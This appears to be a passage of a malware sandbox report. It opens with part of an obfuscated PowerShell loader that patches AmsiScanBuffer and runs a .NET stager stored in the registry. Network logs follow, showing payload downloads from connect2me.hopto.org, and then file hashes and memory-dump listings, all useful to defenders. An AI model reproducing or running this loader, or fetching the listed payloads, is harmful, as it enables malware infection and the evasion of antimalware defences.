bsWNtMqrP=$pRKHJThwAlMUgS.Invoke($Null,@([Object]$mwAlDbS,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$kkwqrPffOy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ndqHzyqstXnVqbnSC,$AczaECbfKdkEWHWUFmwcMO).Invoke($DprkdrtzbsWNtMqrP,[uint32]8,4,[ref]$kkwqrPffOy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DprkdrtzbsWNtMqrP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ndqHzyqstXnVqbnSC,$AczaECbfKdkEWHWUFmwcMO).Invoke($DprkdrtzbsWNtMqrP,[uint32]8,0x20,[ref]$kkwqrPffOy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+'r'+''+'s'+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                            1⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:1140

                          Network

                          • flag-unknown
                            DNS
                            connect2me.hopto.org
                            powershell.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            connect2me.hopto.org
                            IN A
                            Response
                            connect2me.hopto.org
                            IN A
                            37.139.129.113
                          • flag-unknown
                            GET
                            https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/C4Loader.exe
                            powershell.exe
                            Remote address:
                            37.139.129.113:443
                            Request
                            GET /wow/1/2/3/4/5/6/7/C4Loader.exe HTTP/1.1
                            Host: connect2me.hopto.org
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Sat, 24 Dec 2022 17:00:50 GMT
                            Accept-Ranges: bytes
                            ETag: "04d4d46b917d91:0"
                            Server: Microsoft-IIS/10.0
                            Date: Tue, 03 Jan 2023 00:41:22 GMT
                            Content-Length: 1465312
                          • flag-unknown
                            GET
                            https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/new2.exe
                            powershell.exe
                            Remote address:
                            37.139.129.113:443
                            Request
                            GET /wow/1/2/3/4/5/6/7/new2.exe HTTP/1.1
                            Host: connect2me.hopto.org
                            Response
                            HTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Wed, 07 Dec 2022 13:22:05 GMT
                            Accept-Ranges: bytes
                            ETag: "6ab53be63ead91:0"
                            Server: Microsoft-IIS/10.0
                            Date: Tue, 03 Jan 2023 00:41:22 GMT
                            Content-Length: 690704
                          • flag-unknown
                            GET
                            https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/SysApp.exe
                            powershell.exe
                            Remote address:
                            37.139.129.113:443
                            Request
                            GET /wow/1/2/3/4/5/6/7/SysApp.exe HTTP/1.1
                            Host: connect2me.hopto.org
                            Response
                            HTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Tue, 13 Sep 2022 10:41:49 GMT
                            Accept-Ranges: bytes
                            ETag: "8094796d5dc7d81:0"
                            Server: Microsoft-IIS/10.0
                            Date: Tue, 03 Jan 2023 00:41:22 GMT
                            Content-Length: 1486224
                          • flag-unknown
                            GET
                            https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/SmartDefRun.exe
                            powershell.exe
                            Remote address:
                            37.139.129.113:443
                            Request
                            GET /wow/1/2/3/4/5/6/7/SmartDefRun.exe HTTP/1.1
                            Host: connect2me.hopto.org
                            Response
                            HTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Sat, 19 Nov 2022 17:04:00 GMT
                            Accept-Ranges: bytes
                            ETag: "3d334beb38fcd81:0"
                            Server: Microsoft-IIS/10.0
                            Date: Tue, 03 Jan 2023 00:41:23 GMT
                            Content-Length: 3904000
                          • 93.184.220.29:80
                            322 B
                            7
                          • 93.184.220.29:80
                            260 B
                            5
                          • 37.139.129.113:443
                            https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/SmartDefRun.exe
                            tls, http
                            powershell.exe
                            187.2kB
                            7.9MB
                            3500
                            5637

                            HTTP Request

                            GET https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/C4Loader.exe

                            HTTP Response

                            200

                            HTTP Request

                            GET https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/new2.exe

                            HTTP Response

                            200

                            HTTP Request

                            GET https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/SysApp.exe

                            HTTP Response

                            200

                            HTTP Request

                            GET https://connect2me.hopto.org/wow/1/2/3/4/5/6/7/SmartDefRun.exe

                            HTTP Response

                            200
                          • 107.182.129.73:21733
                            vbc.exe
                            757 B
                            4.2kB
                            8
                            6
                          • 104.80.225.205:443
                            138 B
                            3
                          • 8.8.8.8:53
                            connect2me.hopto.org
                            dns
                            powershell.exe
                            66 B
                            82 B
                            1
                            1

                            DNS Request

                            connect2me.hopto.org

                            DNS Response

                            37.139.129.113

                          MITRE ATT&CK Enterprise v6

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            19KB

                            MD5

                            2a8b644b26ededb295b31068db08630f

                            SHA1

                            a1387c761fca641be150e1eb27ca43543625a8a0

                            SHA256

                            bedac1113a80677359d099aa29f7452c5b03a0201decc98a5c89867104630821

                            SHA512

                            32f3924eab4257f20ea4b8c7bb8ed78490fd198f987474afae920f932c4321569d5617aefcb709617229d5d29f053acd6f315701b57b89569c0e7012bfed4176

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            948B

                            MD5

                            a7ce8cefc3f798abe5abd683d0ef26dd

                            SHA1

                            b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

                            SHA256

                            5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

                            SHA512

                            c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

                          • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                            Filesize

                            1.4MB

                            MD5

                            bb86a343080f9f4696c250ef31a18d9d

                            SHA1

                            43b2193dcb1d56eac73ba88a7b461822074192d6

                            SHA256

                            095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                            SHA512

                            24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                          • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                            Filesize

                            1.4MB

                            MD5

                            bb86a343080f9f4696c250ef31a18d9d

                            SHA1

                            43b2193dcb1d56eac73ba88a7b461822074192d6

                            SHA256

                            095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                            SHA512

                            24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                          • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                            Filesize

                            3.7MB

                            MD5

                            f5c51e7760315ad0f0238d268c03c60e

                            SHA1

                            85ebaaa9685634143a72bc82c6e7df87a78eed4c

                            SHA256

                            ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                            SHA512

                            d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                          • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                            Filesize

                            3.7MB

                            MD5

                            f5c51e7760315ad0f0238d268c03c60e

                            SHA1

                            85ebaaa9685634143a72bc82c6e7df87a78eed4c

                            SHA256

                            ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                            SHA512

                            d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                          • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                            Filesize

                            1.4MB

                            MD5

                            b6bbab9f72c88d07b484cc339c475e75

                            SHA1

                            f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                            SHA256

                            dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                            SHA512

                            1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                          • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                            Filesize

                            1.4MB

                            MD5

                            b6bbab9f72c88d07b484cc339c475e75

                            SHA1

                            f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                            SHA256

                            dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                            SHA512

                            1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                          • C:\Users\Admin\AppData\Local\Temp\new2.exe

                            Filesize

                            674KB

                            MD5

                            e479ecb1802253a4c94767c8af306baf

                            SHA1

                            846bb5d88b91b8aa17bdb58eaf246b10e6586402

                            SHA256

                            b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                            SHA512

                            b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                          • C:\Users\Admin\AppData\Local\Temp\new2.exe

                            Filesize

                            674KB

                            MD5

                            e479ecb1802253a4c94767c8af306baf

                            SHA1

                            846bb5d88b91b8aa17bdb58eaf246b10e6586402

                            SHA256

                            b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                            SHA512

                            b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                          • memory/384-139-0x0000000000400000-0x0000000000405000-memory.dmp

                            Filesize

                            20KB

                          • memory/384-133-0x0000000000400000-0x0000000000405000-memory.dmp

                            Filesize

                            20KB

                          • memory/592-226-0x00007FF82E9F0000-0x00007FF82EA00000-memory.dmp

                            Filesize

                            64KB

                          • memory/944-173-0x00000000021D9000-0x00000000026DD000-memory.dmp

                            Filesize

                            5.0MB

                          • memory/944-184-0x00000000026E4000-0x0000000002821000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/944-175-0x00000000021D9000-0x00000000026DD000-memory.dmp

                            Filesize

                            5.0MB

                          • memory/944-174-0x00000000026E4000-0x0000000002821000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1140-207-0x00007FF84FC00000-0x00007FF8506C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1140-223-0x00007FF86D310000-0x00007FF86D3CE000-memory.dmp

                            Filesize

                            760KB

                          • memory/1140-213-0x00007FF86E970000-0x00007FF86EB65000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/1140-214-0x00007FF86D310000-0x00007FF86D3CE000-memory.dmp

                            Filesize

                            760KB

                          • memory/1140-222-0x00007FF86E970000-0x00007FF86EB65000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/1140-221-0x00007FF84FC00000-0x00007FF8506C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1468-182-0x0000016A17B20000-0x0000016A17B42000-memory.dmp

                            Filesize

                            136KB

                          • memory/1468-188-0x00007FF84F190000-0x00007FF84FC51000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1468-190-0x00007FF84F190000-0x00007FF84FC51000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1528-218-0x0000000140000000-0x0000000140029000-memory.dmp

                            Filesize

                            164KB

                          • memory/1528-219-0x00007FF86E970000-0x00007FF86EB65000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/1528-220-0x00007FF86D310000-0x00007FF86D3CE000-memory.dmp

                            Filesize

                            760KB

                          • memory/1528-215-0x0000000140000000-0x0000000140029000-memory.dmp

                            Filesize

                            164KB

                          • memory/1528-224-0x0000000140000000-0x0000000140029000-memory.dmp

                            Filesize

                            164KB

                          • memory/1528-225-0x00007FF86E970000-0x00007FF86EB65000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/1764-209-0x00000000062A0000-0x00000000062BE000-memory.dmp

                            Filesize

                            120KB

                          • memory/1764-177-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                          • memory/1764-211-0x0000000006FB0000-0x0000000007172000-memory.dmp

                            Filesize

                            1.8MB

                          • memory/1764-208-0x00000000060B0000-0x0000000006126000-memory.dmp

                            Filesize

                            472KB

                          • memory/1764-210-0x00000000064A0000-0x00000000064F0000-memory.dmp

                            Filesize

                            320KB

                          • memory/1764-185-0x0000000005710000-0x0000000005D28000-memory.dmp

                            Filesize

                            6.1MB

                          • memory/1764-186-0x00000000051A0000-0x00000000051B2000-memory.dmp

                            Filesize

                            72KB

                          • memory/1764-187-0x00000000052D0000-0x00000000053DA000-memory.dmp

                            Filesize

                            1.0MB

                          • memory/1764-212-0x00000000076B0000-0x0000000007BDC000-memory.dmp

                            Filesize

                            5.2MB

                          • memory/1764-189-0x0000000005200000-0x000000000523C000-memory.dmp

                            Filesize

                            240KB

                          • memory/1916-167-0x00000000057B0000-0x0000000005842000-memory.dmp

                            Filesize

                            584KB

                          • memory/1916-170-0x0000000005C20000-0x0000000005C2A000-memory.dmp

                            Filesize

                            40KB

                          • memory/1916-165-0x0000000000CF0000-0x0000000000E5C000-memory.dmp

                            Filesize

                            1.4MB

                          • memory/1928-192-0x00007FF84F070000-0x00007FF84FB31000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1928-204-0x00007FF84F070000-0x00007FF84FB31000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3808-150-0x0000000007F80000-0x00000000085FA000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/3808-151-0x0000000007940000-0x000000000795A000-memory.dmp

                            Filesize

                            104KB

                          • memory/3808-141-0x0000000003030000-0x0000000003066000-memory.dmp

                            Filesize

                            216KB

                          • memory/3808-142-0x00000000058A0000-0x0000000005EC8000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/3808-143-0x0000000005670000-0x0000000005692000-memory.dmp

                            Filesize

                            136KB

                          • memory/3808-158-0x0000000008BB0000-0x0000000009154000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/3808-157-0x0000000007CD0000-0x0000000007CF2000-memory.dmp

                            Filesize

                            136KB

                          • memory/3808-156-0x0000000007BB0000-0x0000000007BB8000-memory.dmp

                            Filesize

                            32KB

                          • memory/3808-155-0x0000000007C70000-0x0000000007C8A000-memory.dmp

                            Filesize

                            104KB

                          • memory/3808-154-0x0000000007B70000-0x0000000007B7E000-memory.dmp

                            Filesize

                            56KB

                          • memory/3808-153-0x0000000007BD0000-0x0000000007C66000-memory.dmp

                            Filesize

                            600KB

                          • memory/3808-152-0x00000000079B0000-0x00000000079BA000-memory.dmp

                            Filesize

                            40KB

                          • memory/3808-144-0x0000000005F40000-0x0000000005FA6000-memory.dmp

                            Filesize

                            408KB

                          • memory/3808-145-0x0000000005FB0000-0x0000000006016000-memory.dmp

                            Filesize

                            408KB

                          • memory/3808-149-0x0000000006BD0000-0x0000000006BEE000-memory.dmp

                            Filesize

                            120KB

                          • memory/3808-148-0x00000000745C0000-0x000000007460C000-memory.dmp

                            Filesize

                            304KB

                          • memory/3808-147-0x00000000075E0000-0x0000000007612000-memory.dmp

                            Filesize

                            200KB

                          • memory/3808-146-0x0000000006610000-0x000000000662E000-memory.dmp

                            Filesize

                            120KB

                          We care about your privacy.

                          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.